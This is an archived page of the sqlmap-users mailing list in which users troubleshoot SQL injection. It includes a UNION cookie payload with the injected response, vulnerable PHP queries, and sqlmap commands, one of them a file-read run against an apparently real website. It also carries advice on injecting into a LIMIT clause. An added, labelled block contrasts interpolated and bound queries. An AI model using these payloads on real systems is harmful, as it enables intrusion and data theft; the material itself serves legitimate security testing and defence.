sqlmap-users Mailing List for sqlmap (Page 50)
Brought to you by:
inquisb
From: Stephen S. <ss...@ss...> - 2012-09-16 19:33:57
Hi,

This is the HTML from a manual request with sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20

<html>
<head>
<link rel='stylesheet' href='css/styles.css'/>
<title>My Account - Customer Care Centre - Acme Power Co</title>
</head>
<body>
<div id='heading'>
</div>
<div id='menu'>
<a href='index.php'>Home / Login</a> - <a href='account.php'>My Account</a> - <a href='support.php'>Contact Support</a> - <a href='#' onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC Opening Hours</a> - <a href='logout.php'>Logout</a>;
</div>
<div id='content'>
<div id='billz'>
Hi, 2!<br><br>
Have a token: 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account statement, released 04 November 2011. This account is due to be paid on <b>05 November 2011</b>. Failure to pay this amount before the due date may result in service disruption.<br><br><h3>Account Statement</h3><hr><table><tr><td width=200>Account Number</td><td width=450>Description of Service</td><td>Amount</td></tr></table><hr><table><tr><td width=200>1</td><td width=450>Basic Power Service</td><td>4</td></tr></table>
</div>
</div>
</body>
</html>
---------------------------

The relevant bits being "Hi, 2", and the table showing amount of "4" etc.

Thanks,
ss23

On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Stephen.
>
> From this traffic file it's not really clear if this is exploitable by any
> mean more than time-based.
>
> Could you please send the response you get when you "manually exploit" it
> with the payload you've mentioned:
> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...> wrote:
>
>> It ran a little over and started testing User-Agent, but it has the
>> entire log for the session cookie there.
>> The options I used this time were:
>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>> -t traffic.txt --level=5
>>
>> Thanks,
>> ss23
>>
>>
>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Hi.
>>>
>>> In that case could you please send the sqlmap traffic file got by using
>>> -t traffic.txt along with your standard switches/options?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>>
>>>> Hi,
>>>>
>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>> the cookie was being used. In the real script, there was no parse error.
>>>> Nonetheless, sqlmap cannot pull out results.
>>>>
>>>> Thanks
>>>> ss23
>>>>
>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>
>>>>> Hi.
>>>>>
>>>>> I am not sure how are you able to "definitely able to pull out
>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>> single quotes with another pair of single quotes):
>>>>>
>>>>> Bad:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>
>>>>> Good 1:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>
>>>>> Good 2:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>
>>>>> With that code of yours you should get an ugly PHP error message:
>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>
>>>>> Also, you could take a look at similar case here [1].
>>>>>
>>>>> Kind regards,
>>>>> Miroslav Stampar
>>>>>
>>>>> [1]
>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>
>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>>
>>>>>> Hi all,
>>>>>>
>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>> coax it into getting it right.
>>>>>> The PHP source looks something like:
>>>>>>
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>
>>>>>> and then it displays the fields it pulled out.
>>>>>>
>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>> I'm definitely able to pull out results.
>>>>>>
>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>
>>>>>> Thanks,
>>>>>> ss23
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Got visibility?
>>>>>> Most devs has no idea what their production app looks like.
>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-09-16 18:58:29
Hi Stephen.

From this traffic file it's not really clear if this is exploitable by any
mean more than time-based.

Could you please send the response you get when you "manually exploit" it
with the payload you've mentioned:
"sesh=')%20UNION%20select%201,2,3,4%20--%20" ?

Kind regards,
Miroslav Stampar

On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...> wrote:

> It ran a little over and started testing User-Agent, but it has the entire
> log for the session cookie there.
> The options I used this time were:
> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
> -t traffic.txt --level=5
>
> Thanks,
> ss23
>
>
> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> In that case could you please send the sqlmap traffic file got by using
>> -t traffic.txt along with your standard switches/options?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>
>>> Hi,
>>>
>>> Sorry, my mistake. I just copied the line and altered it to show that
>>> the cookie was being used. In the real script, there was no parse error.
>>> Nonetheless, sqlmap cannot pull out results.
>>>
>>> Thanks
>>> ss23
>>>
>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> I am not sure how are you able to "definitely able to pull out results"
>>>> as as I can see the problem lies in used PHP (enclosed pair of single
>>>> quotes with another pair of single quotes):
>>>>
>>>> Bad:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>
>>>> Good 1:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>
>>>> Good 2:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>
>>>> With that code of yours you should get an ugly PHP error message:
>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>
>>>> Also, you could take a look at similar case here [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>
>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>
>>>>> Hi all,
>>>>>
>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>> coax it into getting it right.
>>>>> The PHP source looks something like:
>>>>>
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>
>>>>> and then it displays the fields it pulled out.
>>>>>
>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>> I'm definitely able to pull out results.
>>>>>
>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>
>>>>> Thanks,
>>>>> ss23
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Got visibility?
>>>>> Most devs has no idea what their production app looks like.
>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>

--
Miroslav Stampar
http://about.me/stamparm

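Added example, not part of any message in this thread and not the poster's application code: the query quoted above with the cookie interpolated into the SQL string (as in the "Good 1" variant, which fixes the PHP parse error but still places the cookie value in the SQL text) beside the same query with the cookie bound as a parameter. The in-memory SQLite database reached through PDO, the sample rows and the function names are assumptions made for the example; the thread's code uses mysql_query against MySQL.

```php
<?php
// Added example. Table and column names come from the query quoted in the
// thread; the SQLite in-memory database, the rows and the function names
// are constructed for illustration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ccc_users (userid INTEGER, sessionid TEXT)");
$db->exec("CREATE TABLE custdata (userid INTEGER, custname TEXT,
                                  custemail TEXT, owing INTEGER)");
$db->exec("INSERT INTO ccc_users VALUES (7, 'constructed-session-id')");
$db->exec("INSERT INTO custdata VALUES
           (7, 'Alice Example', 'alice@example.test', 120)");

// Interpolated form: the cookie value becomes part of the SQL text, so a
// quote and a closing parenthesis in it end the subquery early.
function lookupInterpolated(PDO $db, string $sesh): array
{
    $sql = "SELECT userid, custname, custemail, owing FROM custdata AS cd "
         . "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
         . "WHERE sessionid = '$sesh')";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Bound form: the statement text is fixed and the cookie value travels
// separately, so it is only ever compared against the sessionid column.
function lookupBound(PDO $db, string $sesh): array
{
    $stmt = $db->prepare(
        "SELECT userid, custname, custemail, owing FROM custdata AS cd "
        . "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
        . "WHERE sessionid = :sesh)"
    );
    $stmt->execute([':sesh' => $sesh]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// PHP URL-decodes cookie values before they reach $_COOKIE, so the second
// input is decoded here the same way. It is the cookie value from the post.
$inputs = [
    'valid session'   => 'constructed-session-id',
    'value from post' => rawurldecode("')%20UNION%20select%201,2,3,4%20--%20"),
];

foreach ($inputs as $label => $sesh) {
    printf(
        "%-16s interpolated=%s bound=%s\n",
        $label,
        json_encode(lookupInterpolated($db, $sesh)),
        json_encode(lookupBound($db, $sesh))
    );
}
```

For the valid session both functions return the customer row. For the value from the post, the interpolated form returns the row supplied by the UNION, matching the "Hi, 2" and "4" in the response above, while the bound form matches no session and returns no rows.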
From: Andres F. <an...@an...> - 2012-09-15 00:15:09
--
Andres Ferraro

On Friday, September 14, 2012 at 6:33 PM, sql...@li... wrote:

> Send sqlmap-users mailing list submissions to
> sql...@li...
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> or, via email, send a message with subject or body 'help' to
> sql...@li...
>
> You can reach the person managing the list at
> sql...@li...
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of sqlmap-users digest..."
>
>
> Today's Topics:
>
> 1. TypeError: argument of type 'NoneType' is not iterable (M Zverev)
> 2. Re: TypeError: argument of type 'NoneType' is not iterable
>    (Miroslav Stampar)
> 3. Help read file (Jorge Vespa)
> 4. Re: Help read file (Dennis)
> 5. Re: Help read file (Miroslav Stampar)
> 6. Disable output coloring (M Zverev)
> 7. Injecting into LIMIT ints (Chris Oakley)
> 8. Re: Injecting into LIMIT ints (Miroslav Stampar)
> 9. sqlmap error (D Atkin)
> 10. Re: Injecting into LIMIT ints (Chris Oakley)
> 11. MemoryError (Happy User)
> 12. Re: sqlmap error (Miroslav Stampar)
> 13. Re: MemoryError (Miroslav Stampar)
> 14. Re: Disable output coloring (Peter Thomas)
> 15. Re: Disable output coloring (Miroslav Stampar)
> 16. Re: Disable output coloring (Peter Thomas)
> 17. ask error in sqlmap (muhammad husaini harun)
> 18. Re: ask error in sqlmap (Brandon Perry)
> 19. tag FORM not supported (Marco Mirandola)
> 20. Re: tag FORM not supported (Timon Wang)
> 21. Re: tag FORM not supported (Miroslav Stampar)
> 22. Re: tag FORM not supported (Marco Mirandola)
> 23. Re: tag FORM not supported (Chris Oakley)
> 24. Re: tag FORM not supported (Miroslav Stampar)
> 25. Rieqy Erysya (root rieqy)
> 26. Re: Rieqy Erysya (Miroslav Stampar)
> 27. Anyone having trouble with --eval? (Sergio Molina)
> 28. UnicodeEncodeError: 'ascii' codec can't encode characters in
>     position 32-47: ordinal not in range(128) (Happy User)
> 29. Re: UnicodeEncodeError: 'ascii' codec can't encode characters
>     in position 32-47: ordinal not in range(128) (Miroslav Stampar)
> 30. Re: Anyone having trouble with --eval? (Miroslav Stampar)
> 31. Two problems with sqlmap (Duarte Silva)
> 32. freebsd9.0/unhandled exception in sqlmap/0.9 (milong mao)
> 33. Re: freebsd9.0/unhandled exception in sqlmap/0.9
>     (Miroslav Stampar)
> 34. Melhorar o scan (Roberto Neves)
> 35. Re: Melhorar o scan (André Silva)
> 36. Re: Melhorar o scan (du...@al...)
> 37. Re: Melhorar o scan (James)
> 38. Re: Two problems with sqlmap (Miroslav Stampar)
> 39. Re: Two problems with sqlmap (Duarte Silva)
> 40. Re: Two problems with sqlmap (Miroslav Stampar)
> 41. Re: Two problems with sqlmap (Duarte Silva)
> 42. Bypassing IDS/IPS (Arturs Pavlovs)
> 43. Re: Bypassing IDS/IPS (du...@al...)
> 44. Re: Bypassing IDS/IPS (Chris Oakley)
> 45. Problem with multiple target mode (David London)
> 46. Re: Problem with multiple target mode (Miroslav Stampar)
> 47. unhandled exception (el draco)
> 48. Re: unhandled exception (Miroslav Stampar)
> 49. Re: unhandled exception (André Silva)
> 50. Re: unhandled exception (Miroslav Stampar)
> 51. wrong file size checking with os-shell (Robin Wood)
> 52. Re: wrong file size checking with os-shell (Miroslav Stampar)
> 53. Re: wrong file size checking with os-shell (Robin Wood)
> 54. Simple failed injection (Stephen Shkardoon)
> 55. Re: Simple failed injection (Miroslav Stampar)
> 56. Re: Simple failed injection (Stephen Shkardoon)
> 57. Re: Simple failed injection (Miroslav Stampar)
> 58. Re: Simple failed injection (Stephen Shkardoon)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 28 Jul 2012 15:33:18 +0400
> From: M Zverev <rob...@gm...>
> Subject: [sqlmap-users] TypeError: argument of type 'NoneType' is not
> iterable
> To: sql...@li...
> Message-ID: <501...@gm...>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-dba0a96
> Python version: 2.7.3
> Operating system: nt
> Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u
> *************************************** -D ****** -T *********** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
>     start()
>   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in start
>     action()
>   File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
>     conf.dbmsHandler.dumpTable()
>   File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, in dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
>     value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
>   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in unionUse
>     value = __oneShotUnionUse(expression, unpack)
>   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in __oneShotUnionUse
>     if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
> TypeError: argument of type 'NoneType' is not iterable
>
>
>
> ------------------------------
>
> Message: 2
> Date: Sun, 29 Jul 2012 17:34:42 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] TypeError: argument of type 'NoneType' is
> not iterable
> To: M Zverev <rob...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CA+9yoX16=+4P...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/126
>
> On Sat, Jul 28, 2012 at 1:33 PM, M Zverev <rob...@gm...> wrote:
>
> > [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96,
> > retry your run with the latest development version from the GitHub
> > repository. If the exception persists, please send by e-mail to
> > 'sql...@li...' or open a new issue at
> > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> > text and any information required to reproduce the bug. The
> > developers will try to reproduce the bug, fix it accordingly and get
> > back to you.
> > sqlmap version: 1.0-dev-dba0a96
> > Python version: 2.7.3
> > Operating system: nt
> > Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u
> > *************************************** -D ****** -T *********** --dump
> > Technique: UNION
> > Back-end DBMS: MySQL (fingerprinted)
> > Traceback (most recent call last):
> >   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
> >     start()
> >   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in start
> >     action()
> >   File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
> >     conf.dbmsHandler.dumpTable()
> >   File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, in dumpTable
> >     entries = inject.getValue(query, blind=False, dump=True)
> >   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
> >     value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
> >   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
> >     output = unionUse(expression, unpack=unpack, dump=dump)
> >   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in unionUse
> >     value = __oneShotUnionUse(expression, unpack)
> >   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in __oneShotUnionUse
> >     if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
> > TypeError: argument of type 'NoneType' is not iterable
> >
> >
> > ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 3
> Date: Sun, 29 Jul 2012 22:51:49 -0400
> From: "Jorge Vespa" <jv...@co...>
> Subject: [sqlmap-users] Help read file
> To: <sql...@li...>
> Message-ID: <080501cd6dfe$43f6f030$cbe4d090$@com.bo>
> Content-Type: text/plain; charset="us-ascii"
>
> Hi, great tool.
>
>
> I could never read or write a file on the server, I don't know why.
>
>
> For example this vulnerable web:
>
>
> python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL"
> --file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5
>
>
> It return the error: /www/redpat.tv/htdocs/php/multimedia/p3.php file saved
> to: 'None'
>
>
> If you go to:
>
> http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL'
>
> you can see selecting to see the text, that the path on the server is right,
> thanks to the error message.
>
>
> Hope you can help me, thanks.
>
>
>
> Jorge Vespa
> COTASnet
> 3862818
> Santa Cruz - Bolivia
>
>
>
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 4
> Date: Mon, 30 Jul 2012 08:59:48 +0200
> From: Dennis <kor...@ya...>
> Subject: Re: [sqlmap-users] Help read file
> To: Jorge Vespa <jv...@co...>
> Cc: sql...@li...
> Message-ID: <501...@ya...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Jorge,
>
> please do not post any vulnerabilities of real web pages to the mailing
> list. Could get you or anyone replying into trouble.
>
> Cheers,
> Dennis
>
>
>
> ------------------------------
>
> Message: 5
> Date: Mon, 30 Jul 2012 13:14:32 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Help read file
> To: Dennis <kor...@ya...>
> Cc: sql...@li...
> Message-ID:
> <CA+9yoX0+U7U2Bt8qNv9sNXmRGtgbXtYNifHsy-Z5=CeV...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Jorge.
>
> Dennis is right. Posting real targets on this ML is considered as an
> inappropriate.
>
> In your case you are most probably having problems with backend DBMS
> permissions as in majority of similar cases.
>
> In such cases switches -t and/or --parse-errors are great for debugging
> purposes.
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jul 30, 2012 at 8:59 AM, Dennis <kor...@ya...> wrote:
>
> > Hi Jorge,
> >
> > please do not post any vulnerabilities of real web pages to the mailing
> > list. Could get you or anyone replying into trouble.
> >
> > Cheers,
> > Dennis
> >
> >
> > ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 6
> Date: Thu, 02 Aug 2012 15:17:44 +0400
> From: M Zverev <rob...@gm...>
> Subject: [sqlmap-users] Disable output coloring
> To: sql...@li...
> Message-ID: <501...@gm...>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> I often redirect sqlmap output to a text file with the command >, and
> that leave annoying marks like
> [0m
> [31m
> at the beginning and the end of lines, and I have to clean that out.
> Is there a way to disable output coloring?
>
>
>
> ------------------------------
>
> Message: 7
> Date: Fri, 3 Aug 2012 15:08:32 +0100
> From: Chris Oakley <chr...@gm...>
> Subject: [sqlmap-users] Injecting into LIMIT ints
> To: sql...@li...
> Message-ID:
> <CAF6VE=pnf...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi All
>
> I have found that an application has a rewritten URL element that ends up
> in a SQL query. The error message tells me that I'm injecting into the
> LIMIT number at the end of the query. This appears to be the only point of
> injection for now.
>
> A simplified version of the query that's being injected into is:
>
> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
> created_date DESC LIMIT foo, 10
>
> 'foo' is my injection and of course gives a syntax error.
>
> I know that apostrophes/ticks (as in the ' character) are blocked as a
> minimum.
>
> Does anyone have any experience injecting this late in a query? Any ideas
> would be greatly received.
>
> Regards
>
> Chris
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 8
> Date: Fri, 3 Aug 2012 17:15:05 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Injecting into LIMIT ints
> To: Chris Oakley <chr...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Chris.
>
> In those kind of cases UNION injection should be a solution.
>
> As LIMIT doesn't accept subquery as an operand you have to append a UNION
> ALL SELECT to the original value (foo in your case) and necessarily add a
> comment to the end (e.g. --) to neutralize that second operand of affected
> LIMIT part.
>
> To make it short, LIMIT doesn't accept subqueries and standard non-UNION
> based injection techniques should fail (as they "seed" their payload into
> the affected SQL form - in this case LIMIT).
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...> wrote:
>
> > Hi All
> >
> > I have found that an application has a rewritten URL element that ends up
> > in a SQL query. The error message tells me that I'm injecting into the
> > LIMIT number at the end of the query. This appears to be the only point of
> > injection for now.
> >
> > A simplified version of the query that's being injected into is:
> >
> > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
> > created_date DESC LIMIT foo, 10
> >
> > 'foo' is my injection and of course gives a syntax error.
> >
> > I know that apostrophes/ticks (as in the ' character) are blocked as a
> > minimum.
> >
> > Does anyone have any experience injecting this late in a query? Any ideas
> > would be greatly received.
> >
> > Regards
> >
> > Chris
> >
> >
> > ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 9
> Date: Fri, 3 Aug 2012 16:37:19 +0000
> From: D Atkin <je...@ho...>
> Subject: [sqlmap-users] sqlmap error
> To: <sql...@li...>
> Message-ID: <COL...@ph...l>
> Content-Type: text/plain; charset="windows-1256"
>
>
> Hi,
>
> I'm trying to run sqlmap from msf but I keep getting this error:
>
> the sqlmap script could not be found:
>
> I've already had sqlmap path to system Path environment but I'm still getting this error.
>
> Can you tell me what I can do from here?
>
> Thank you!
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 10
> Date: Fri, 3 Aug 2012 17:37:22 +0100
> From: Chris Oakley <chr...@gm...>
> Subject: Re: [sqlmap-users] Injecting into LIMIT ints
> To: Miroslav Stampar <mir...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CAF6VE=pT7...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Thanks Miroslav, I'll give it a go!
>
> On 3 August 2012 16:15, Miroslav Stampar <mir...@gm...> wrote:
>
> > Hi Chris.
> >
> > In those kind of cases UNION injection should be a solution.
> >
> > As LIMIT doesn't accept subquery as an operand you have to append a UNION
> > ALL SELECT to the original value (foo in your case) and necessarily add a
> > comment to the end (e.g. --) to neutralize that second operand of affected
> > LIMIT part.
> >
> > To make it short, LIMIT doesn't accept subqueries and standard non-UNION
> > based injection techniques should fail (as they "seed" their payload into
> > the affected SQL form - in this case LIMIT).
> >
> > Kind regards,
> > Miroslav Stampar
> >
> > On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...> wrote:
> >
> > > Hi All
> > >
> > > I have found that an application has a rewritten URL element that ends up
> > > in a SQL query. The error message tells me that I'm injecting into the
> > > LIMIT number at the end of the query. This appears to be the only point of
> > > injection for now.
> > >
> > > A simplified version of the query that's being injected into is:
> > >
> > > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
> > > created_date DESC LIMIT foo, 10
> > >
> > > 'foo' is my injection and of course gives a syntax error.
> > >
> > > I know that apostrophes/ticks (as in the ' character) are blocked as a
> > > minimum.
> > >
